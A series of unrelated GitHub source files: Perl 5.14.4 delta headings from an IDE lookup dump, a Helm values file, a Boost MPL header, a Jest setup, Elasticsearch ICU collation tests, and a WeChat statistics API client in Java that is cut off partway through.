Lookups: Incompatible Changes
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2215 in perl5144delta.pod
Text: Known Problems; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Known Problems
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3880 in perl5144delta.pod
Text: List::Util; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: List::Util
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 2694 in perl5144delta.pod
Text: Modules and Pragmata; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Modules and Pragmata
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 2427 in perl5144delta.pod
Text: NAME; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: NAME
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 16 in perl5144delta.pod
Text: New Documentation; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: New Documentation
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2942 in perl5144delta.pod
Text: New Modules and Pragmata; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: New Modules and Pragmata
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2456 in perl5144delta.pod
Text: New Platforms; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: New Platforms
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 3182 in perl5144delta.pod
Text: Platform Support; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Platform Support
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3157 in perl5144delta.pod
Text: Platform-Specific Notes; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Platform-Specific Notes
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 3249 in perl5144delta.pod
Text: Removed Modules and Pragmata; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Removed Modules and Pragmata
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2876 in perl5144delta.pod
Text: Reporting Bugs; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Reporting Bugs
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 4878 in perl5144delta.pod
Text: SDBM_File; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: SDBM_File
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 2677 in perl5144delta.pod
Text: SEE ALSO; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: SEE ALSO
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 6066 in perl5144delta.pod
Text: Security; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Security
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 381 in perl5144delta.pod
Text: Selected Bug Fixes; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Selected Bug Fixes
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3549 in perl5144delta.pod
Text: Socket; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: Socket
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 2663 in perl5144delta.pod
Text: Updated Modules and Pragmata; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Updated Modules and Pragmata
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2495 in perl5144delta.pod
Text: Utility Changes; Tail: null; Type: 1st Heading; Icon: /perl5language.png; Type Icon: null
Lookups: Utility Changes
PsiElement: PsiHead1SectionImpl(Perl5 POD: HEAD_1_SECTION) at 3076 in perl5144delta.pod
Text: VMS; Tail: null; Type: List Item; Icon: /perl5language.png; Type Icon: null
Lookups: VMS
PsiElement: PsiItemSectionImpl(Perl5 POD: ITEM_SECTION) at 3290 in perl5144delta.pod
Text: [perl #111586] SDBM_File: fix off-by-one access to global ".dir"; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #111586] SDBM_File: fix off-by-one access to global ".dir"
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1213 in perl5144delta.pod
Text: [perl #111594] Socket::unpack_sockaddr_un heap-buffer-overflow; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #111594] Socket::unpack_sockaddr_un heap-buffer-overflow
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1025 in perl5144delta.pod
Text: [perl #115992] PL_eval_start use-after-free; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #115992] PL_eval_start use-after-free
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1832 in perl5144delta.pod
Text: [perl #115994] fix segv in regcomp.c:S_join_exact(); Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: [perl #115994] fix segv in regcomp.c:S_join_exact()
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1564 in perl5144delta.pod
Text: memory leak in Encode; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: memory leak in Encode
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 907 in perl5144delta.pod
Text: off-by-two error in List::Util; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: off-by-two error in List::Util
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 1391 in perl5144delta.pod
Text: wrap-around with IO on long strings; Tail: null; Type: 2nd Heading; Icon: /perl5language.png; Type Icon: null
Lookups: wrap-around with IO on long strings
PsiElement: PsiHead2SectionImpl(Perl5 POD: HEAD_2_SECTION) at 2038 in perl5144delta.pod | {
"pile_set_name": "Github"
} |
# Default values for geektime-mobile-apiaggregator.
# This is a YAML-formatted file.
# Declare variables to be passed into your templates.
replicaCount: 1
image:
repository: geektime-mobile-apiaggregator
pullPolicy: IfNotPresent
imagePullSecrets: []
nameOverride: ""
fullnameOverride: ""
serviceAccount:
# Specifies whether a service account should be created
create: false
# The name of the service account to use.
# If not set and create is true, a name is generated using the fullname template
name:
podSecurityContext: {}
# fsGroup: 2000
securityContext: {}
# capabilities:
# drop:
# - ALL
# readOnlyRootFilesystem: true
# runAsNonRoot: true
# runAsUser: 1000
service:
type: ClusterIP
port: 80
ingress:
enabled: false
annotations: {}
# kubernetes.io/ingress.class: nginx
# kubernetes.io/tls-acme: "true"
hosts:
- host: chart-example.local
paths: []
tls: []
# - secretName: chart-example-tls
# hosts:
# - chart-example.local
resources: {}
# We usually recommend not to specify default resources and to leave this as a conscious
# choice for the user. This also increases the chances that charts run on environments with little
# resources, such as Minikube. If you do want to specify resources, uncomment the following
# lines, adjust them as necessary, and remove the curly braces after 'resources:'.
# limits:
# cpu: 100m
# memory: 128Mi
# requests:
# cpu: 100m
# memory: 128Mi
nodeSelector: {}
tolerations: []
affinity: {}
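# A hedged install-time override example (release name, chart path and
# registry below are hypothetical):
#   helm install my-release ./geektime-mobile-apiaggregator \
#     --set replicaCount=2 \
#     --set image.repository=registry.example.com/geektime-mobile-apiaggregator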
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/not_equal_to.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl {
template<
typename Tag1
, typename Tag2
>
struct not_equal_to_impl
: if_c<
( BOOST_MPL_AUX_NESTED_VALUE_WKND(int, Tag1)
> BOOST_MPL_AUX_NESTED_VALUE_WKND(int, Tag2)
)
, aux::cast2nd_impl< not_equal_to_impl< Tag1,Tag1 >,Tag1, Tag2 >
, aux::cast1st_impl< not_equal_to_impl< Tag2,Tag2 >,Tag1, Tag2 >
>::type
{
};
/// for Digital Mars C++/compilers with no CTPS/TTP support
template<> struct not_equal_to_impl< na,na >
{
template< typename U1, typename U2 > struct apply
{
typedef apply type;
BOOST_STATIC_CONSTANT(int, value = 0);
};
};
template< typename Tag > struct not_equal_to_impl< na,Tag >
{
template< typename U1, typename U2 > struct apply
{
typedef apply type;
BOOST_STATIC_CONSTANT(int, value = 0);
};
};
template< typename Tag > struct not_equal_to_impl< Tag,na >
{
template< typename U1, typename U2 > struct apply
{
typedef apply type;
BOOST_STATIC_CONSTANT(int, value = 0);
};
};
template< typename T > struct not_equal_to_tag
{
typedef typename T::tag type;
};
template<
typename BOOST_MPL_AUX_NA_PARAM(N1)
, typename BOOST_MPL_AUX_NA_PARAM(N2)
>
struct not_equal_to
: not_equal_to_impl<
typename not_equal_to_tag<N1>::type
, typename not_equal_to_tag<N2>::type
>::template apply< N1,N2 >::type
{
BOOST_MPL_AUX_LAMBDA_SUPPORT(2, not_equal_to, (N1, N2))
};
BOOST_MPL_AUX_NA_SPEC2(2, 2, not_equal_to)
}}
namespace boost { namespace mpl {
template<>
struct not_equal_to_impl< integral_c_tag,integral_c_tag >
{
template< typename N1, typename N2 > struct apply
: bool_< ( BOOST_MPL_AUX_VALUE_WKND(N1)::value != BOOST_MPL_AUX_VALUE_WKND(N2)::value ) >
{
};
};
}}
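// Usage sketch (illustrative; not part of this preprocessed header):
//
//   #include <boost/mpl/not_equal_to.hpp>
//   #include <boost/mpl/int.hpp>
//   typedef boost::mpl::not_equal_to<
//       boost::mpl::int_<3>, boost::mpl::int_<4> >::type result; // mpl::true_
//   static_assert(result::value, "3 != 4 at compile time");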
| {
"pile_set_name": "Github"
} |
import Enzyme from "enzyme";
import Adapter from "enzyme-adapter-react-16";
import "jest-enzyme";
// Minimal localStorage stub so code touching storage doesn't crash in tests.
global.localStorage = {
getItem: () => null, // real localStorage returns null for missing keys
setItem: () => {},
clear: () => {}
};
Enzyme.configure({ adapter: new Adapter() });
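// A minimal sketch of wiring this file into Jest (the path below is
// hypothetical); entries in "setupFiles" run before each test file loads:
//
//   // jest.config.js
//   // module.exports = { setupFiles: ["<rootDir>/test/setup.js"] };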
| {
"pile_set_name": "Github"
} |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.index.analysis;
import com.ibm.icu.text.Collator;
import com.ibm.icu.text.RuleBasedCollator;
import com.ibm.icu.util.ULocale;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.analysis.Tokenizer;
import org.apache.lucene.analysis.core.KeywordTokenizer;
import org.apache.lucene.analysis.tokenattributes.CharTermAttribute;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.index.Index;
import org.elasticsearch.plugin.analysis.icu.AnalysisICUPlugin;
import org.elasticsearch.test.ESTestCase;
import java.io.IOException;
import java.io.StringReader;
import static org.hamcrest.Matchers.equalTo;
// Tests borrowed from Solr's Icu collation key filter factory test.
public class SimpleIcuCollationTokenFilterTests extends ESTestCase {
/*
* Tests usage where we do not provide a language or locale
*/
public void testDefaultUsage() throws Exception {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.strength", "primary")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "FOO", "foo");
}
/*
* Turkish has some funny casing.
* This test shows how you can solve this kind of thing easily with collation.
* Instead of using LowerCaseFilter, use a turkish collator with primary strength.
* Then things will sort and match correctly.
*/
public void testBasicUsage() throws Exception {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "tr")
.put("index.analysis.filter.myCollator.strength", "primary")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "I WİLL USE TURKİSH CASING", "ı will use turkish casıng");
}
/*
* Test usage of the decomposition option for unicode normalization.
*/
public void testNormalization() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "tr")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.decomposition", "canonical")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "I W\u0049\u0307LL USE TURKİSH CASING", "ı will use turkish casıng");
}
/*
* Test secondary strength, for english case is not significant.
*/
public void testSecondaryStrength() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "secondary")
.put("index.analysis.filter.myCollator.decomposition", "no")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "TESTING", "testing");
}
/*
* Setting alternate=shifted to shift whitespace, punctuation and symbols
* to quaternary level
*/
public void testIgnorePunctuation() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.alternate", "shifted")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "foo-bar", "foo bar");
}
/*
* Setting alternate=shifted and variableTop to shift whitespace, but not
* punctuation or symbols, to quaternary level
*/
public void testIgnoreWhitespace() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.alternate", "shifted")
.put("index.analysis.filter.myCollator.variableTop", " ")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "foo bar", "foobar");
// now assert that punctuation still matters: foo-bar < foo bar
assertCollation(filterFactory, "foo-bar", "foo bar", -1);
}
/*
* Setting numeric to encode digits with numeric value, so that
* foobar-9 sorts before foobar-10
*/
public void testNumerics() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.numeric", "true")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollation(filterFactory, "foobar-9", "foobar-10", -1);
}
/*
* Setting caseLevel=true to create an additional case level between
* secondary and tertiary
*/
public void testIgnoreAccentsButNotCase() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "primary")
.put("index.analysis.filter.myCollator.caseLevel", "true")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "résumé", "resume");
assertCollatesToSame(filterFactory, "Résumé", "Resume");
// now assert that case still matters: resume < Resume
assertCollation(filterFactory, "resume", "Resume", -1);
}
/*
* Setting caseFirst=upper to cause uppercase strings to sort
* before lowercase ones.
*/
public void testUpperCaseFirst() throws IOException {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.language", "en")
.put("index.analysis.filter.myCollator.strength", "tertiary")
.put("index.analysis.filter.myCollator.caseFirst", "upper")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollation(filterFactory, "Resume", "resume", -1);
}
/*
* For german, you might want oe to sort and match with o umlaut.
* This is not the default, but you can make a customized ruleset to do this.
*
* The default is DIN 5007-1, this shows how to tailor a collator to get DIN 5007-2 behavior.
* http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=4423383
*/
public void testCustomRules() throws Exception {
RuleBasedCollator baseCollator = (RuleBasedCollator) Collator.getInstance(new ULocale("de_DE"));
String DIN5007_2_tailorings =
"& ae , a\u0308 & AE , A\u0308"+
"& oe , o\u0308 & OE , O\u0308"+
"& ue , u\u0308 & UE , u\u0308";
RuleBasedCollator tailoredCollator = new RuleBasedCollator(baseCollator.getRules() + DIN5007_2_tailorings);
String tailoredRules = tailoredCollator.getRules();
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.rules", tailoredRules)
.put("index.analysis.filter.myCollator.strength", "primary")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollatesToSame(filterFactory, "Töne", "Toene");
}
/*
* Test a basic custom rules (should not interfere with reading rules list
* in IcuCollationTokenFilterFactory and throw InvalidPathException on
* Windows platforms).
*/
public void testBasicCustomRules() throws Exception {
Settings settings = Settings.builder()
.put("index.analysis.filter.myCollator.type", "icu_collation")
.put("index.analysis.filter.myCollator.rules", "&a < g")
.build();
TestAnalysis analysis = createTestAnalysis(new Index("test", "_na_"), settings, new AnalysisICUPlugin());
TokenFilterFactory filterFactory = analysis.tokenFilter.get("myCollator");
assertCollation(filterFactory, "green", "bird", -1);
}
private void assertCollatesToSame(TokenFilterFactory factory, String string1, String string2) throws IOException {
assertCollation(factory, string1, string2, 0);
}
private void assertCollation(TokenFilterFactory factory, String string1, String string2, int comparison) throws IOException {
Tokenizer tokenizer = new KeywordTokenizer();
tokenizer.setReader(new StringReader(string1));
TokenStream stream1 = factory.create(tokenizer);
tokenizer = new KeywordTokenizer();
tokenizer.setReader(new StringReader(string2));
TokenStream stream2 = factory.create(tokenizer);
assertCollation(stream1, stream2, comparison);
}
private void assertCollation(TokenStream stream1, TokenStream stream2, int comparison) throws IOException {
CharTermAttribute term1 = stream1.addAttribute(CharTermAttribute.class);
CharTermAttribute term2 = stream2.addAttribute(CharTermAttribute.class);
stream1.reset();
stream2.reset();
assertThat(stream1.incrementToken(), equalTo(true));
assertThat(stream2.incrementToken(), equalTo(true));
assertThat(Integer.signum(term1.toString().compareTo(term2.toString())), equalTo(Integer.signum(comparison)));
assertThat(stream1.incrementToken(), equalTo(false));
assertThat(stream2.incrementToken(), equalTo(false));
stream1.end();
stream2.end();
stream1.close();
stream2.close();
}
}
| {
"pile_set_name": "Github"
} |
package me.hao0.wechat.core;
import com.fasterxml.jackson.databind.JavaType;
import com.google.common.collect.Maps;
import me.hao0.wechat.model.data.article.ArticleDailySummary;
import me.hao0.wechat.model.data.article.ArticleShare;
import me.hao0.wechat.model.data.article.ArticleShareHour;
import me.hao0.wechat.model.data.article.ArticleSummary;
import me.hao0.wechat.model.data.article.ArticleSummaryHour;
import me.hao0.wechat.model.data.article.ArticleTotal;
import me.hao0.wechat.model.data.interfaces.InterfaceSummary;
import me.hao0.wechat.model.data.interfaces.InterfaceSummaryHour;
import me.hao0.wechat.model.data.msg.MsgSendDist;
import me.hao0.wechat.model.data.msg.MsgSendSummary;
import me.hao0.wechat.model.data.msg.MsgSendSummaryHour;
import me.hao0.wechat.model.data.user.UserCumulate;
import me.hao0.wechat.model.data.user.UserSummary;
import me.hao0.common.json.Jsons;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import static me.hao0.common.util.Preconditions.*;
/**
 * Data statistics component
* Author: haolin
* Email: [email protected]
* Date: 18/11/15
* @since 1.4.0
*/
public final class Datas extends Component {
/**
     * User growth/decline data
*/
private static final String USER_SUMMARY = "https://api.weixin.qq.com/datacube/getusersummary?access_token=";
/**
     * Cumulative user data
*/
private static final String USER_CUMULATE = "https://api.weixin.qq.com/datacube/getusercumulate?access_token=";
/**
     * Daily article-broadcast data
*/
private static final String ARTICLE_DAILY_SUMMARY = "https://api.weixin.qq.com/datacube/getarticlesummary?access_token=";
/**
     * Total article-broadcast data
*/
private static final String ARTICLE_TOTAL = "https://api.weixin.qq.com/datacube/getarticletotal?access_token=";
/**
     * Article read statistics
*/
private static final String ARTICLE_SUMMARY = "https://api.weixin.qq.com/datacube/getuserread?access_token=";
/**
     * Hourly article read statistics
*/
private static final String ARTICLE_SUMMARY_HOUR = "https://api.weixin.qq.com/datacube/getuserreadhour?access_token=";
/**
     * Article share/forward data
*/
private static final String ARTICLE_SHARE = "https://api.weixin.qq.com/datacube/getusershare?access_token=";
/**
     * Hourly article share/forward data
*/
private static final String ARTICLE_SHARE_HOUR = "https://api.weixin.qq.com/datacube/getusersharehour?access_token=";
/**
     * API analysis data
*/
private static final String INTERFACE_SUMMARY = "https://api.weixin.qq.com/datacube/getinterfacesummary?access_token=";
/**
     * Hourly API analysis data
*/
private static final String INTERFACE_SUMMARY_HOUR = "https://api.weixin.qq.com/datacube/getinterfacesummaryhour?access_token=";
/**
     * Message-send data
*/
private static final String MSG_SEND_SUMMARY = "https://api.weixin.qq.com/datacube/getupstreammsg?access_token=";
/**
     * Hourly message-send data
*/
private static final String MSG_SEND_SUMMARY_HOUR = "https://api.weixin.qq.com/datacube/getupstreammsghour?access_token=";
/**
     * Weekly message-send data
*/
private static final String MSG_SEND_SUMMARY_WEEK = "https://api.weixin.qq.com/datacube/getupstreammsgweek?access_token=";
/**
     * Monthly message-send data
*/
private static final String MSG_SEND_SUMMARY_MONTH = "https://api.weixin.qq.com/datacube/getupstreammsgmonth?access_token=";
/**
     * Message-send distribution data
*/
private static final String MSG_SEND_DIST = "https://api.weixin.qq.com/datacube/getupstreammsgdist?access_token=";
/**
     * Weekly message-send distribution data
*/
private static final String MSG_SEND_SUMMARY_DIST_WEEK = "https://api.weixin.qq.com/datacube/getupstreammsgdistweek?access_token=";
/**
     * Monthly message-send distribution data
*/
private static final String MSG_SEND_SUMMARY_DIST_MONTH = "https://api.weixin.qq.com/datacube/getupstreammsgdistmonth?access_token=";
private static final JavaType USER_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, UserSummary.class);
private static final JavaType USER_CUMULATE_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, UserCumulate.class);
private static final JavaType ARTICLE_DAILY_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleDailySummary.class);
private static final JavaType ARTICLE_TOTAL_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleTotal.class);
private static final JavaType ARTICLE_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleSummary.class);
private static final JavaType ARTICLE_SUMMARY_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleSummaryHour.class);
private static final JavaType ARTICLE_SHARE_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleShare.class);
private static final JavaType ARTICLE_SHARE_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, ArticleShareHour.class);
private static final JavaType INTERFACE_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, InterfaceSummary.class);
private static final JavaType INTERFACE_SUMMARY_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, InterfaceSummaryHour.class);
private static final JavaType MSG_SEND_SUMMARY_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, MsgSendSummary.class);
private static final JavaType MSG_SEND_SUMMARY_HOUR_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, MsgSendSummaryHour.class);
private static final JavaType MSG_SEND_DIST_LIST_TYPE = Jsons.DEFAULT.createCollectionType(ArrayList.class, MsgSendDist.class);
Datas(){}
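    /*
     * Minimal usage sketch (illustrative only: it assumes a configured Wechat
     * instance that exposes this component, e.g. via wechat.data(); that
     * accessor name is an assumption, not part of this file):
     *
     *   List<UserSummary> growth = wechat.data().userSummary("2016-01-01", "2016-01-07");
     *   wechat.data().userSummary("2016-01-01", "2016-01-07", cb); // async variant
     */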
/**
     * Queries user growth data (span at most 7 days: endDate - startDate < 7)
     * @param startDate start date
     * @param endDate end date
     * @return user growth statistics
*/
public List<UserSummary> userSummary(String startDate, String endDate){
return userSummary(loadAccessToken(), startDate, endDate);
}
/**
     * Queries user growth data (span at most 7 days: endDate - startDate < 7)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void userSummary(final String startDate, final String endDate, Callback<List<UserSummary>> cb){
userSummary(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Queries user growth data (span at most 7 days: endDate - startDate < 7)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void userSummary(final String accessToken, final String startDate, final String endDate, Callback<List<UserSummary>> cb){
doAsync(new AsyncFunction<List<UserSummary>>(cb) {
@Override
public List<UserSummary> execute() throws Exception {
return userSummary(accessToken, startDate, endDate);
}
});
}
/**
     * Queries user growth data (span at most 7 days: endDate - startDate < 7)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return user growth statistics
*/
public List<UserSummary> userSummary(String accessToken, String startDate, String endDate){
return doSummary(USER_SUMMARY + accessToken, startDate, endDate, USER_SUMMARY_LIST_TYPE);
}
/**
     * Queries cumulative user data (span at most 7 days: endDate - startDate < 7)
     * @param startDate start date
     * @param endDate end date
     * @return cumulative user statistics
*/
public List<UserCumulate> userCumulate(String startDate, String endDate){
return userCumulate(loadAccessToken(), startDate, endDate);
}
/**
     * Queries cumulative user data (span at most 7 days: endDate - startDate < 7)
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void userCumulate(final String startDate, final String endDate, Callback<List<UserCumulate>> cb){
userCumulate(loadAccessToken(), startDate, endDate, cb);
}
/**
     * Queries cumulative user data (span at most 7 days: endDate - startDate < 7)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @param cb callback
*/
public void userCumulate(final String accessToken, final String startDate, final String endDate, Callback<List<UserCumulate>> cb){
doAsync(new AsyncFunction<List<UserCumulate>>(cb) {
@Override
public List<UserCumulate> execute() throws Exception {
return userCumulate(accessToken, startDate, endDate);
}
});
}
/**
     * Queries cumulative user data (span at most 7 days: endDate - startDate < 7)
     * @param accessToken accessToken
     * @param startDate start date
     * @param endDate end date
     * @return cumulative user statistics
*/
public List<UserCumulate> userCumulate(String accessToken, String startDate, String endDate){
return doSummary(USER_CUMULATE + accessToken, startDate, endDate, USER_CUMULATE_LIST_TYPE);
}
/**
     * Fetches daily article-broadcast data:
     * read counts and related metrics, for a given day, of every article read that day (broadcast articles only)
     * @param date date
     * @return daily article-broadcast data
*/
public List<ArticleDailySummary> articleDailySummary(String date){
return articleDailySummary(loadAccessToken(), date);
}
/**
     * Fetches daily article-broadcast data:
     * read counts and related metrics, for a given day, of every article read that day (broadcast articles only)
     * @param accessToken accessToken
     * @param date date
     * @param cb callback
*/
public void articleDailySummary(final String accessToken, final String date, Callback<List<ArticleDailySummary>> cb){
doAsync(new AsyncFunction<List<ArticleDailySummary>>(cb) {
@Override
public List<ArticleDailySummary> execute() throws Exception {
return articleDailySummary(accessToken, date);
}
});
}
/**
     * Fetches daily article-broadcast data:
     * read counts and related metrics, for a given day, of every article read that day (broadcast articles only)
     * @param date date
     * @param cb callback
*/
public void articleDailySummary(final String date, Callback<List<ArticleDailySummary>> cb){
articleDailySummary(loadAccessToken(), date, cb);
}
/**
     * Fetches daily article-broadcast data:
     * read counts and related metrics, for a given day, of every article read that day (broadcast articles only)
     * @param accessToken accessToken
     * @param date date
     * @return daily article-broadcast data
*/
public List<ArticleDailySummary> articleDailySummary(String accessToken, String date){
return doSummary(ARTICLE_DAILY_SUMMARY + accessToken, date, date, ARTICLE_DAILY_SUMMARY_LIST_TYPE);
}
/**
     * Fetches total article-broadcast data
     * @param date date
     * @return total article-broadcast data
*/
public List<ArticleTotal> articleTotal(String date){
return articleTotal(loadAccessToken(), date);
}
/**
     * Fetches total article-broadcast data
     * @param date date
     * @param cb callback
*/
